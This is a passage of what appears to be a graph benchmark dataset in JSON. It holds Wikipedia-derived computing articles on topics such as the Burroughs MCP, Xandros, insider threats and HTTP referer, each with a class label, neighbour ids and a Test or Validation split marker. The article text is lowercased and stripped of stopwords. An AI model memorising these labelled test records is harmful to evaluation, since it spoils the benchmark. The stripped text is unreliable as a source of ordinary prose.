child parent processes scheduling one mmu ram expansion card developed support colin minix port although unclear ever used purpose conal walsh ported cp/m clone zrdos z80-based disk controller card operating mode 68000 acted console zrdos although still possible suspend connection zrdos run 1616 programs provided n't need disk i/o strictly operating system mgr windowing system run 1616/os usurped console video keyboard added virtual tty devices window mgr port required video hack add higher resolution monochrome video mode done replacing pal video circuit unix minix programs able ported 1616/os ports included several messaging bulletin board systems written including usenet fidonet gateways many utilities allow safe shell-level dial-up access several computer languages supported including collection 1616/os shareware eventually grew seventeen 800kb floppies included innumerable small utilities ported applications environments applix pty ltd started holding informal user group meetings sydney store 1987 meetings held second saturday month often finished well midnight consumption much pizza users brought latest 1616-related creations demonstrate share discussion ranged hardware design operating system theory language design politics philosophy mortons sold shop 1990s meetings moved house yerrinbool southern highlands nsw mortons moved wollongong meetings moved able escape user group moving around nsw mortons moved palo alto california 2001 user group still meets second saturday every month although many years since applix 1616 booted one everyone older meetings tend end somewhat midnight pizza consumed moderation",
    "neighbors": [
      7299,
      9735,
      7691,
      780,
      6415,
      3222,
      3350,
      9762,
      10658,
      7076,
      2345,
      4398,
      7983,
      4409,
      3904,
      3659,
      477,
      7269,
      6502,
      1776,
      5492,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5712,
    "label": 3,
    "text": "Murder_on_the_Mississippi:murder mississippi murder mississippi fully titled murder mississippi adventures sir charles foxworth 1986 detective adventure game developed published activision commodore 64 commodore 128 apple ii computers also licensed release exclusively japan jaleco ported game nintendo famicom msx2 adventure game player must solve murder mystery luxury ship delta princess heading new orleans st. louis ship delta princess detective sir charles watson caught midst murder case chance must solve holmes becomes second victim appearance similar painting sherlock holmes charles doyle arthur conan doyle father known regis activision version memos taken occasionally takes walks without notice charles death longs everything right way prostitute staying room 8 going new orleans visit aunt pearl aunt secret formula okra soup popular among passengers prostitute nevada staying room 2f20 judge staying room 9 reputation drinking widow millionaire staying room 2f23 bad reputation amongst passengers captain speaks incident even entering cabin discovering body philanthropist staying room 2f15 hobby shooting often hits birds crew member staying room 1f27 brown illegitimate son love taylor victim found dead room 4 owner delta princess co-manages nelson also managed many additional businesses sir charles staying room 3 normal assumption start investigation room 1- however pitfalls exist room 1 room 14 falling one holes results death instant game also trap room 16 knife flies air towards sir charles immediately enters unless knife dodged hits sir charles head kills resulting another instant game solving case reveals true criminal identity person set traps remains mystery since watson fall pitfall traps players suspect might one set suspect spoken per piece new information— consequently piece information missed first time around since impossible talk lead player becoming impossibly stuck game unable progress bears sense reality angered many players also bad ending game final stage game player must present evidence reveal prosecute true criminal however insufficient evidence examined/obtained player simply receive game due lack evidence compute called murder mississippi rich enjoyable adventure game",
    "neighbors": [
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 5713,
    "label": 2,
    "text": "Font_Book:font book font book font manager apple inc. macos operating system first released mac os x panther 2003 opened default whenever user clicks new .otf .ttf font file user view font install point font copied centralised folder user-installed fonts available apps use may also used browser installed fonts user may view list fonts see alphabets complete repertoire characters set sample text user choice program also allows users feature editing tools even changing font properties means user use rename merge split fonts redesign modify fonts example changing kerning rules exporting small capitals separate style 2003-7 period apple font book faced criticism regarding inability validate auto-activate fonts features added font book release mac os x leopard",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      166,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 5714,
    "label": 2,
    "text": "Burroughs_MCP:burroughs mcp mcp master control program proprietary operating system burroughs small medium large systems including unisys clearpath/mcp systems originally written 1961 espol executive systems programming language extension burroughs extended algol 1970s converted newp better structured robust secure form espol mcp leader many areas including first operating system manage multiple processors first commercial implementation virtual memory first os written exclusively high-level language 1961 mcp first os written exclusively high-level language hll burroughs large system b5000 successors unique designed expectation software including system software would written hll rather assembly language unique innovative approach 1961 unlike ibm faced hardware competition departure gene amdahl burroughs software designed run proprietary hardware reason burroughs free distribute source code software sold including mcp designed openness mind example upgrading required user recompile system software apply needed local patches time common practice necessary unusual customers especially large ones federal reserve modify program fit specific needs result burroughs users group formed held annual meetings allowed users exchange extensions os parts system software suite many extensions found way base os code years available customers mcp could considered one earliest open-source projects burroughs first manufacturer distribute source code late entry electronic computing compared traditional rivals ncr ibm univac mcp runs commodity hardware elements mcp based software suite longer made available source form unisys mcp first commercial os provide virtual memory supported burroughs large systems architecture since inception scheme unique industry stores retrieves compiler-defined objects rather fixed-size memory pages consequence overall non-von neumann uniformly stack-based architecture mcp provides file system hierarchical directory structures early mcp implementations directory nodes represented separate files directory entries systems however since 1970 mcp internally uses 'flat directory listing file paths volume opening files visiting opening directory file path inefficient production environment found better keep files single directory even though retain hierarchical naming scheme programmatically makes difference difference visible users entity file name directory example a/b a/b/c exist b node file directory files stored named volumes example 'this/is/a/filename myvol 'myvol volume name device independent since disk containing 'myvol moved copied different physical disk drives disks also concatenated single volume installed across several drives well mirrored recoverability sensitive data added flexibility program make volume substitutions volume name may substituted primary secondary alternate name referred process ’ family instance assignment “ family disk userpack otherwise syspack ” stores files logically designated volume disk onto volume userpack seek files first volume userpack search success another search file done volume syspack disk default volume name none specified file system set file attributes attributes record sorts meta data file importantly name type tells system handle file like limited four-character file type code macintosh attributes file record size fixed commercial applications block size multiples records tells mcp many records read write single physical io area size multiples blocks gives size disk areas allocated file expands file type indicates file character data source code written particular languages binary data code files files protected usual security access mechanisms public private file may guard file owner specify complex security rules another security mechanism code files created trusted compilers malicious programmers create program call compiler – program could converted compiler operator sufficient privileges 'mc make compiler operator command mcp implements journaling file system providing fault tolerance case disk failure loss power etc possible corrupt file system except operating system trusted system software direct access lower layers file system case-insensitive case-preserving unless quotes added around name case case-sensitive case-preserving mcp processes called jobs tasks job contains one tasks tasks within job run sequentially parallel logic implemented job level typically mcp job control language wfl control flow job tasks job complete job completed mcp process goes life cycle time enters system leaves initial state job queued period time job resides one several user defined job queues next state scheduled job moves queue memory tasks within job wait queue instead going directly 'scheduled state initiated job task started transition active waiting scheduled progresses job task completes moves 'completed state running processes use processor resource marked 'running processes ready assigned processor free processor placed ready queue processes may assigned “ declared ” “ visible ” priority generally 50 default 0 99 user processes system processes may assigned higher values note numerical priority secondary overall priority based task type processes directly part operating system called independent runners highest priority regardless numeric priority value next come processes using mcp lock message control systems cande discontinued processes work flow language jobs finally come user processes lower level fine priority intended elevate priority tasks use full processor slice allows io bound task get processor time ahead processor bound task declared priority processes waiting resources file read wait event data structure thus processes waiting single resource wait single event resource becomes available event caused wakes processes waiting processes may wait multiple events one happen including time events fully user programmable – users write systems use generalized event system provided mcp processes terminated marked completed operationally status tasks system displayed operator running ready processes displayed 'active tasks since system implements preemptive multitasking change ready running back quick distinguishing ready running tasks pointless get slice processor within second active tasks displayed command terminated tasks displayed completed tasks reason termination eot normal 'end task dsed reason process failure processes assigned mix number operators use number identify process control one command ds command stands either delete schedule discontinue deep six influence navy personnel early computer projects depending talk tasks terminated operator listed complete entries o-ds tasks also terminate due program faults marked f-ds p-ds faults invalid index numeric overflow etc completed entries listed operator c command tasks waiting resource listed waiting entries reason waiting waiting tasks may listed w command reason waiting also listed information task may seen command may task waiting operator input sent task via accept 'ax command note operator input different user input would input network device gui interface tasks waiting user input file reads would normally listed waiting entries operator attention another reason task waiting waiting file process opens file file present task placed waiting entries noting waiting certain file operator user owns process opportunity either copy file expected place redirect task read file another place file might even created independent process n't yet completed resource provided operator operator ds task last resort different systems automatically terminate task resource file available mcp provides level operator recoverability tasks systems force programmers add code check presence files accessing thus extra code must written every case provide recoverability process synchronization code may written mcp program desirable task wait operator-level recoverability forced therefore makes programming much simpler addition ability dynamically remap file database requests files databases program execution several mechanisms available allow programmers detect recover errors one way 'on statement around many years specific faults e.g. divide zero listed catch-all 'anyfault used statement block following 'on statement recognized compiler fault-handling code execution recoverable fault occurs scope 'on statement stack cut back control transferred statement following one problem handling logic behind statement would invoked program faults program terminations causes time need guaranteed handling abnormal terminations grew particular mechanism needed allow programs invoke plug-ins written customers third parties without risk plug-in behave badly addition general plug-in mechanisms new form dynamic library linkage connection libraries allows programs import export functions data hence one program runs code supplied another accomplish enhanced protection newer mechanism introduced mid 1990s misguided attempt compatibility named then-proposed c++ language construct name syntax behavior two differ large extent choosing name led confusion misunderstanding syntactically 'try statements look like 'if statements 'try followed statement block followed 'else another statement block additional 'else clauses may follow first execution recoverable termination occurs code following 'try clause stack cut back required control branches code following first 'else addition attributes set allow program determine happened including specific line number events would result task termination recoverable includes stack overflow array access out-of-bounds integer over/under flow etc operator user ds recoverable except privileged tasks using unsafe form try mcp thus provides fault-tolerant environment crash-and-burn core-dump systems file attributes tasks attributes well task priority assigned compile time execution time changed task running processor time wait time status etc task attributes accessed programmatically file attributes files parent task available programmatically task attribute type task example 'myself.initiator.name gives name process initiated current process codice_1 codice_2 two main procedures handling memory allocation deallocation memory needs allocated process initiation whenever block entered uses arrays files etc codice_1 codice_2 handle memory space also allocate deallocate disk space non memory resident data may overlaid memory may save i.e. memory resident overlayable i.e. virtual memory sticky meaning memory resident movable called upon e.g codice_5 process addresses uninitialized array codice_6 codice_5 handles hardware interrupts may call upon codice_1 codice_9 like codice_10 called upon task exiting block blockexit may turn call codice_11 codice_2 like cleaning releasing resources declared used within block j_edgar_hoover main security guardian system called upon process start file open user log etc codice_13 procedure decides process next one receive cpu resources thus one processes uses movestack instruction task goes various states starting nascent delivery event birth caused task state changes alive processkill called upon state changes diseased death caused task gets put queue structure morgue remaining resources freed system process called processkill task alive mcp functions run top particular process thus cpu resources automatically charged task causing mcp overhead also much mcp work performed particular stack security rights birth death mcp need operating stack none available system maintains idle stack mcp libraries provide way sharing data code processes article burroughs large systems looks way dependent processes could asynchronously run many processes could share common data mechanisms provide synchronized update family related processes written single program unit processing procedures higher lex levels asynchronous processes could still access global variables variables lower lex levels libraries completely inverted scenario following advantages clean radical library mechanism much system software underwent major rewrites resulting better structured systems performance boosts libraries introduced mcp systems early 1980s developed roy guck others burroughs much like c. a. r. hoare monitors provide opportunity controlled mutual exclusion synchronization client processes using mcp events dahm locking technique libraries offer procedural entry-points client checked compatible interface parameters return types imported procedures checked client linked library library client may written different languages advantage synchronization provided library client code need worry level programming results robust code since clients ca n't undermine synchronization code library would call 'trusted computing initiative libraries sophisticated forms libraries systems dlls mcp libraries 'shared ‘ shared rununit ’ 'private private case closest libraries systems – client separate copy library invoked data sharing processes shared interesting client starts run requires services library upon first reference library entry-point linkage initiated instance library already running client linked instance library clients share instance shared rununit sharing mechanism two sharing schemes designed specifically cobol rununit defined original initiating client program libraries linked rununit gets one instance library different rununits get different instance dynamic implementation cobol rununits first invocation library library would run main program outer block algol program initialize global environment initialization complete would execute freeze point exported entry points would made available clients point library stack said frozen since nothing would run stack library became unfrozen case clean-up termination code would run client calls routine library routine runs top client stack storing locals temporary variables allows many clients running routine time synchronized library routine accesses data global environment library stack freeze could also three forms – temporary permanent controlled temporary meant client count dropped zero library would unfrozen terminated permanent meant library remained available clients even client count dropped zero – permanent libraries could unfrozen operator thaw command controlled freeze meant library actually kept running could execute monitoring functions perform data initialization cleanup functions linking client libraries could also accessed 'by title 'by function 'by title client specified file name library 'by function indirect method client would specify function name library example 'system_support actual location library found table previously set operator 'sl system library commands example 'sl system_support *system/library/support mcp fault tolerant attitude also works – client tries accessing library present client put 'waiting tasks library could made present request redirected libraries also updated fly needs done 'sl new version running clients continue use old version terminate new clients directed new version function libraries also implemented important security feature linkage classes normal libraries linkage class zero libraries used mcp privileged system modules may usable normal programs accessed function forced linkage class one client linkage class zero link linkage class one entry-points library linkage class one needs offer entry-points normal programs designated ‘ trusted ’ offer selected entry-points linkage class zero entire database system implemented libraries providing efficient tailored access databases shared many clients goes networking functionality system intrinsics mid-1990s new type library made available connection libraries programs right execute independently well import export data functions programs arrays structure blocks example networking component operating system available connection library allowing programs use services exporting importing functions upon linkage client gets dedicated structure block keep state information program uses network might import network-write function export network-read function thus open network connection e.g. using tcp data arrives read networking component directly call function consume without first copy data buffer context switch likewise write data network directly calling network-write function connection libraries allow significant degree control linkages side linkage optionally approve linkage sever linkage desired state easily maintained per linkage well globally another technique inter-process communication ipc port files like unix pipes except generalized multiway bidirectional since order magnitude slower ipc techniques libraries better use techniques ipc different processes machine advantageous use port files therefore distributed ipc port files introduced bna burroughs network architecture advent standard networking technologies osi tcp/ip port files used networks well server listening incoming connections declares port file file kind attribute equal port connection made client creates subfile index port file represents multiple connections different clients around network server process receives client requests anywhere network issuing read port file subfile 0 read subfile issues response client issued request writing particular subfile request read mcp also provides sophisticated yet simple operator environment large installations many operators might required make physical resources printers loading paper toner cartridges etc available low-end environments small offices single user may require operator-free environment especially laptop implementation large systems dedicated operations terminals called odts operator display terminals usually kept secure environment small systems machines controlled terminal provided terminal user sufficient privileges using marc program menu assisted resource control operator commands also used users familiar operator commands mostly two letters unix one letter means operator interface must learned efficient experienced operators run large mainframe system day day commands case insensitive tasks entered program 'mix identified mix numbers libraries execute program operators use 'ex 'run command followed file name program odts run typically adm automatic display mode tailorable display system status usually set display active waiting completed mix entries well system messages operator notifications situations requiring operator action complete listing displays given active w waiting c completed 'msg message commands task becomes waiting operator action operator find task needs entering mix number followed command note object-oriented style commands selecting object first followed command example '3456y operator force task waiting entries stop command '3456st make active ok '3456ok ok command also used operator made resource available task although frequently mcp detect resources become available cause event processes waiting without operator intervention pass textual information operator program accept command ‘ 3456ax info ’ used programs pass information operators using display mechanism causes display messages added msg display well tasks processes operators also control files files listed using file command copied using copy removed using remove renamed operating environment mcp powerful yet simple usually requires fraction number operators systems important part operations environment high-level work flow language actions system logged example messages displayed operator operator actions significant program actions optionally logged system log program log example boj beginning wfl job bot beginning task within wfl job eot eoj end tasks jobs well file database open closes logged logging many events contributes apparent slowness mcp operating environment compared systems like unix since everything logged forced physical writes program log every record systems like unix ’ even though keep many things system logs logs used forensics find programs systems may failed detecting attempts compromise system security system logs automatically closed system-settable period new one opened system logs contain huge amount information filtered analyzed programs loganalyzer dumpanalyzer analyzes memory dumps originally written tape compilers added lineinfo code-files dumpanalyzer able pinpoint exactly source statement executed time error also normal program dump one program dumped contains information source-code sequence number variable names two analyzers major diagnostic tools kinds purposes beyond many technical innovations mcp design burroughs large systems many management innovations used internet community large system software shipped customers inclusive source code editing compilation tools needed generate new versions mcp customers many customers developed niche expertise inner workings mcp customers often sent 'patches fragment pieces source code sequence numbers suggestions new enhanced features fault corrections ftr field trouble reports many suggested patches included systems developers integrated next version mcp release including community voluntary self-professed experts mainstream technical work widely practised essence open innovation management innovation community development dated back 1970s mcp first os developed exclusively high-level language 50-year history many firsts commercial implementation including virtual memory symmetric multiprocessing high-level job control language wfl long many facilities appearing widespread operating systems together burroughs large systems architecture mcp provides secure high performance multitasking transaction processing environment",
    "neighbors": [
      512,
      2432,
      2179,
      3587,
      2181,
      3716,
      4998,
      6675,
      11539,
      11295,
      9762,
      4900,
      1702,
      6056,
      10924,
      2477,
      7983,
      11184,
      1073,
      8499,
      11059,
      10040,
      8001,
      8262,
      4423,
      8136,
      5065,
      1610,
      2002,
      477,
      5472,
      2533,
      2283,
      3443,
      2804,
      6772,
      9335,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5715,
    "label": 9,
    "text": "MINLOG:minlog minlog proof assistant developed university munich team helmut schwichtenberg minlog based first order natural deduction calculus intended reason computable functionals using minimal rather classical intuitionistic logic main motivation behind minlog exploit proofs-as-programs paradigm program development program verification proofs fact treated first class objects normalized formula existential proof used reading instance changed appropriately program development proof transformation end minlog equipped tools extract functional programs directly proof terms also applies non-constructive proofs using refined a-translation system supported automatic proof search normalization evaluation efficient term rewriting device",
    "neighbors": [
      4791
    ],
    "mask": "Test"
  },
  {
    "node_id": 5716,
    "label": 5,
    "text": "Physical_Layer_Convergence_Protocol:physical layer convergence protocol physical layer convergence protocol physical layer protocol several data transmission networks used 802.11 standard",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5717,
    "label": 3,
    "text": "Tank_Battalion:tank battalion player controlling tank must destroy twenty enemy tanks round enter playfield top screen enemy tanks attempt destroy player base represented map eagle well player tank round cleared player destroys twenty enemy tanks game ends player base destroyed runs lives",
    "neighbors": [
      1060,
      9093,
      2540,
      9006,
      10287,
      1776,
      7281,
      10931,
      8663
    ],
    "mask": "Test"
  },
  {
    "node_id": 5718,
    "label": 7,
    "text": "Cloud_research:cloud research many universities vendors institutes government organizations investing cloud computing research 2012 european commission issued analysis relevance open research issues commercial stabilisation various experts industry academia identify particular following major concerns findings refined research roadmap proposed cloud computing expert group research december 2012 tries lay timeline identified research topics according commercial relevance 8th framework programmes research technological development european commission trying support according research work along lines europe 2020 strategy",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 5719,
    "label": 9,
    "text": "Absys:absys absys early declarative programming language university aberdeen anticipated number features prolog negation failure aggregation operators central role backtracking constraint solving absys first implementation logic programming language name absys chosen abbreviation aberdeen system",
    "neighbors": [
      9345,
      8421,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 5720,
    "label": 6,
    "text": "Coherent_file_distribution_protocol:coherent file distribution protocol coherent file distribution protocol cfdp ietf-documented experimental protocol intended high-speed one-to-many file transfers class 1 assured delivery class 2 blind unassured delivery see rfc 1235",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5721,
    "label": 2,
    "text": "Xandros:xandros xandros software company sold xandros desktop linux distribution name xandros derived x window system greek island andros xandros founded may 2001 linux global partners roseman dr. frederick berenstein company headquartered new york city xandros desktop based corel linux debian-based distribution acquired along development team behind product corel corporation august 2001 corel decided sell linux distribution market xandros founding member desktop linux consortium member interop vendor alliance july 2007 xandros bought scalix linux-based email collaboration product based hp openmail july 2008 xandros acquired linspire xandros ’ website unresponsive last update november 2009 distrowatch lists xandros discontinued 1 january 2018 announced pc/opensystems llc purchased xandros linspire bridgeways inc. xandros made products consumer business markets distributions included many packages licensed free software open-source xandros also included proprietary software developed in-house xandros corporation edition came 30-day trial crossover office also included applications cd includes extra programs installed via xandros networks opposed home edition premium home edition include photo manager music manager security suite wireless profiles ability write ntfs partitions edition came full version crossover office standard edition second cd applications cd included extra applications could installed via xandros networks despite name xandros desktop home edition premium include xandros networks premium membership xandros corporation offered 30-day trial version xandros home edition premium free download evaluation purposes formerly known xandros desktop business edition edition basically xandros desktop home edition premium included ability authenticate windows pdc active directory domains used pptp vpn connect remotely office used broadband wireless connectivity 3g gsm umts support xandros desktop professional officially released 28 november 2006 home edition premium xandros corporation also offered 30-day trial version xandros professional introduced 2009 presto lightweight instant-on operating system uses lightweight xfce 4.6 desktop environment similar canonical wubi installer ubuntu installed inside microsoft windows windows xp earliest supported version also access application store based cnr acquired xandros acquisition linspire mid-2008 2009 xandros announced would develop new netbook operating system based moblin v2 xandros desktop management server xdms available easily set repositories deploys customized xandros desktop configurations across large organization xandros server designed run servers officially launched 2006 linuxworld conference expo toronto 25 april 2006 officially released purchase xandros website 1 may 2006 msrp usd 450 xandros server 2.0 released may 2007 xandros open circulation edition oce freely redistributable edition non-commercial use limited set additional software soon 4.0 version released dvd shrinkwrapped linux magazines torrent pulled xandros servers references oce removed xandros website without explanation previous versions xandros oce generally released 4 months release commercial versions xandros desktop os standard edition basically open circulation edition included full-speed cd/dvd burning product replaced home edition xandros desktop os deluxe edition included applications cd included extra programs could installed via xandros networks product replaced home edition premium xandros desktop os surfside edition branded sold xandros surfside linux basically xandros desktop os standard edition however surfside edition also included plantronics usb headset 120 minutes skypeout service according distrowatch xandros desktop discontinued distrowatch made decision new official version official updates xandros desktop released since november 2006 xandros purchased linspire announced plans retain freespire debian-based free community distribution base future editions xandros desktop professional – home edition home edition premium discontinued – freespire would similar way novell bases suse linux enterprise desktop free opensuse way red hat bases red hat enterprise linux free fedora however according one website xandros discontinued freespire addition distrowatch website added freespire list discontinued distributions xandros graphical user interface gui used modified version kde included replacing konqueror proprietary file manager called xandros file manager also used package manager known xandros networks handles installation software installation xandros done wizard asks questions partitioning administrator root password possible install use gnome xfce desktop environments xandros june 2007 broad collaboration agreement xandros microsoft announced agreement included patent covenants similar agreement microsoft reached novell 2009 xandros bridgeways released first many management packs systems center bridgeways management pack suite products includes 2010 bridgeways “ extending system center ” expanding scope market potential systems center windows linux unix vmware application environment monitoring bridgeways ’ focus building selling supporting management packs system center see bridgeways users track alerts system center service manager 2010 bridgeways compete microsoft group works closely microsoft system center r sales marketing teams maximize value system center customers addition xandros bridgeways system center resells direct partner network distributors isvs si mvps worldwide contributing member system center community collaboration asus hardware xandros operating system first netbook came asus eee pc available either xandros windows xp installed version xandros tab based built scratch using xlib qt 4.5 toolkit full desktop version advanced mode may installed—but always easily—through set administrative command prompts full desktop version features kde 3 desktop modifications performed xandros desktop mode also provides access synaptic package manager used update manage eee pc software february 2009 announced xandros porting eee pc linux distribution 2 arm processor-based freescale i.mx515 qualcomm snapdragon cpu platforms netbooks mobile devices",
    "neighbors": [
      7938,
      2692,
      8837,
      1032,
      7435,
      6797,
      10127,
      2193,
      2321,
      8211,
      5397,
      4887,
      10394,
      4123,
      10780,
      10397,
      673,
      929,
      3745,
      10530,
      9253,
      10149,
      11305,
      3245,
      7854,
      2738,
      2230,
      439,
      56,
      4790,
      9913,
      3131,
      59,
      7483,
      3903,
      3649,
      4673,
      10945,
      2375,
      4039,
      8907,
      1110,
      3162,
      11263,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9455,
      9461,
      11121,
      6393,
      11388,
      8957,
      2559
    ],
    "mask": "Test"
  },
  {
    "node_id": 5722,
    "label": 4,
    "text": "Insider_threat:insider threat insider threat malicious threat organization comes people within organization employees former employees contractors business associates inside information concerning organization security practices data computer systems threat may involve fraud theft confidential commercially valuable information theft intellectual property sabotage computer systems insider threat comes three categories insiders may accounts giving legitimate access computer systems access originally given serve performance duties permissions could abused harm organization insiders often familiar organization data intellectual property well methods place protect makes easier insider circumvent security controls aware physical proximity data means insider need hack organizational network outer perimeter traversing firewalls rather building already often direct access organization internal network insider threats harder defend attacks outsiders since insider already legitimate access organization information assets insider may attempt steal property information personal gain benefit another organization country threat organization could also malicious software left running computer systems former employees so-called logic bomb insider threat active area research academia government cert coordination center carnegie-mellon university maintains cert insider threat center includes database 850 cases insider threats including instances fraud theft sabotage database used research analysis cert insider threat team also maintains informational blog help organizations businesses defend insider crime 2018 insider threat report whitepaper determined 53 companies surveyed confirmed insider attacks organization previous 12 months 27 saying insider attacks become frequent report published july 2012 insider threat u.s. financial sector gives statistics insider threat incidents 80 malicious acts committed work working hours 81 perpetrators planned actions beforehand 33 perpetrators described difficult 17 disgruntled insider identified 74 cases financial gain motive 81 cases revenge 23 cases 27 people carrying malicious acts financial difficulties time us department defense personnel security research center published report describes approaches detecting insider threats earlier published ten case studies insider attacks information technology professionals forensically investigating insider data theft notoriously difficult requires novel techniques stochastic forensics national insider threat special interest group nitsig created response u.s. goverment presidential executive order 13587 structural reforms improve security classified networks responsible sharing safeguarding classified information national insider threat policy national industrial security program operating manual conforming change 2 nitsig created function national insider threat information sharing analysis center nitsig membership largest network 1000+ insider threat mitigation professionals u.s. globally willingness members collaborate share information among membership driving force made nitsig successful encourage become member attend meetings events charge become member https //nationalinsiderthreatsig.org insider threat defense group one first companies offer comprehensive insider threat program development management training u.s. government agencies department defense intelligence community defense contractors required develop implement insider threat programs https //www.insiderthreatdefense.us damaging insider threat incident impacts insider threat incidents severe costly damaging incidents insiders malicious non-malicious insider incidents damaging malicious incidents listed link numerous insider threat incidents severe impacts organizations https //www.insiderthreatdefense.us/insider-threat/",
    "neighbors": [
      612,
      3525,
      10119,
      1640,
      3433,
      7337,
      9929,
      3629,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5723,
    "label": 2,
    "text": "389_Directory_Server:389 directory server 389 directory server previously fedora directory server lightweight directory access protocol ldap server developed red hat part community-supported fedora project name 389 derives port number used ldap 389 directory server supports many operating systems including fedora red hat enterprise linux debian solaris hp-ux 11i late 2016 project merged experimental freebsd support however 389 directory server team 2017 likely remove hpux solaris support upcoming 1.4.x series 389 source code generally available gnu general public license version 3 components exception plugin code components use lgplv2 apache red hat also markets commercial version project red hat directory server part support contracts rhel 389 directory server derived original university michigan slapd project 1996 project developers hired netscape communications corporation project became known netscape directory server nds acquiring netscape aol sold ownership nds intellectual property sun microsystems retained rights akin ownership sun sold developed netscape directory server name jes/sunone directory server oracle directory server since takeover sun oracle aol/netscape rights acquired red hat june 1 2005 much source code released free software terms gnu general public license gpl 389 directory server version 1.0 december 1 2005 red hat released free software remaining source code components included release package admin server console etc continues maintain respective licenses may 2009 fedora directory server project changed name 389 give project distribution vendor neutral name encourage porting running software operating systems 389 directory server rfc4511 compliant server project focus ease use stability correctness performance subset rfcs 389 directory server supports addition supported rfcs 389 directory server supports number features unique project",
    "neighbors": [
      8582,
      9353,
      1553,
      10387,
      1304,
      2974,
      929,
      5677,
      7983,
      823,
      10172,
      9665,
      8386,
      10961,
      11643,
      8539,
      4961,
      5988,
      488,
      5096,
      8554,
      9455,
      5492,
      4729,
      6651,
      2045,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5724,
    "label": 8,
    "text": "HTTP_referer:http referer http misspelling referrer optional http header field identifies address webpage i.e uri iri linked resource requested checking referrer new webpage see request originated common situation means user clicks hyperlink web browser browser sends request server holding destination webpage request may include field indicates last page user one clicked link default behaviour referer leaking puts websites risk privacy security breaches misspelling referrer originated original proposal computer scientist phillip hallam-baker incorporate field http specification misspelling set stone time incorporation request comments standards document rfc 1945 document co-author roy fielding remarked neither referrer misspelling recognized standard unix spell checker period since become widely used spelling industry discussing http referrers usage misspelling universal though correct spelling referrer used web specifications document object model visiting web page referrer referring page url previous webpage link followed generally referrer url previous item led request referrer image example generally html page displayed referrer field optional part http request sent web browser web server many websites log referrers part attempt track users web log analysis software process information referrer information violate privacy web browsers allow user disable sending referrer information proxy firewall software also filter referrer information avoid leaking location non-public websites turn cause problems web servers block parts website web browsers send right referrer information attempt prevent deep linking unauthorised use images bandwidth theft proxy software ability give top-level address target website referrer usually prevents problems still divulging user last-visited website many blogs publish referrer information order link back people linking hence broaden conversation led turn rise referrer spam sending fake referrer information order popularize spammer website possible access referrer information client side using document.referrer javascript used example individualize web page based user search engine query however referrer field always include queries using google search https web servers maintain logs traffic record http referrer sent web browser request raises number privacy concerns result number systems prevent web servers sent real referring url developed systems work either blanking referrer field replacing inaccurate data generally internet-security suites blank referrer data web-based servers replace false url usually raises problem referrer spam technical details methods fairly consistent – software applications act proxy server manipulate http request web-based methods load websites within frames causing web browser send referrer url website address web browsers give users option turn referrer fields request header web browsers send referrer field instructed redirect using refresh field include versions opera many mobile web browsers however method redirection discouraged world wide web consortium w3c website accessed http secure https connection link points anywhere except another secure location referrer field sent html5 standard added support attribute/value rel= noreferrer instructs user agent send referrer another referrer hiding method convert original link url data uri scheme-based url containing small html page meta refresh original url user redirected data page original referrer hidden content security policy standard version 1.1 introduced new referrer directive allows control browser behavior regards referrer header specifically allows webmaster instruct browser block referrer reveal moving origin etc",
    "neighbors": [
      2945,
      3462,
      8584,
      5012,
      1944,
      7324,
      4893,
      7708,
      7965,
      3744,
      4640,
      2470,
      5543,
      5934,
      6576,
      4797,
      8648,
      9036,
      9941,
      2016,
      225,
      3941,
      4453,
      6002,
      4725,
      8443,
      124,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5725,
    "label": 3,
    "text": "Cache_pollution:cache pollution cache pollution describes situations executing computer program loads data cpu cache unnecessarily thus causing useful data evicted cache lower levels memory hierarchy degrading performance example multi-core processor one core may replace blocks fetched cores shared cache prefetched blocks may replace demand-fetched blocks cache consider following illustration assumptions cache composed one level unlocked replacement policy pseudo-lru data cacheable set associativity cache n n 1 one processor register available contain program values right loop starts 0 fetched memory cache value updated however loop executes number data elements loop references requires whole cache filled capacity cache block containing 0 evicted thus next time program requests 0 updated cache misses cache controller request data bus bring corresponding cache block main memory case cache said polluted changing pattern data accesses positioning first update 0 loop second update eliminate inefficiency code-restructuring mentioned solution cache pollution ensure high-reuse data stored cache achieved using special cache control instructions operating system support hardware support examples specialized hardware instructions include lvxl provided powerpc altivec instruction loads 128 bit wide value register marks corresponding cache block least recently used i.e prime candidate eviction upon need evict block cache set appropriately use instruction context example data elements referenced loop would loaded using instruction implemented manner cache pollution would take place since execution loop would cause premature eviction 0 cache would avoided loop would progress addresses elements c would map cache way leaving actually older marked least recently used data intact way oldest data pertinent example given would evicted cache 0 member since update occurs right loop start similarly using operating system os support pages main memory correspond c data array marked caching inhibited words non-cacheable similarly hardware level cache bypassing schemes used identify low-reuse data based program access pattern bypass cache also shared cache partitioned avoid destructive interference running applications tradeoff solutions os-based schemes may large latency may nullify gain achievable cache pollution avoidance unless memory region non-cacheable begin whereas hardware-based techniques may global view program control flow memory access pattern cache pollution control increasing importance penalties caused so-called memory wall keep growing chip manufacturers continue devising new tricks overcome ever increasing relative memory-to-cpu latency increasing cache sizes providing useful ways software engineers control way data arrives stays cpu cache pollution control one numerous devices available 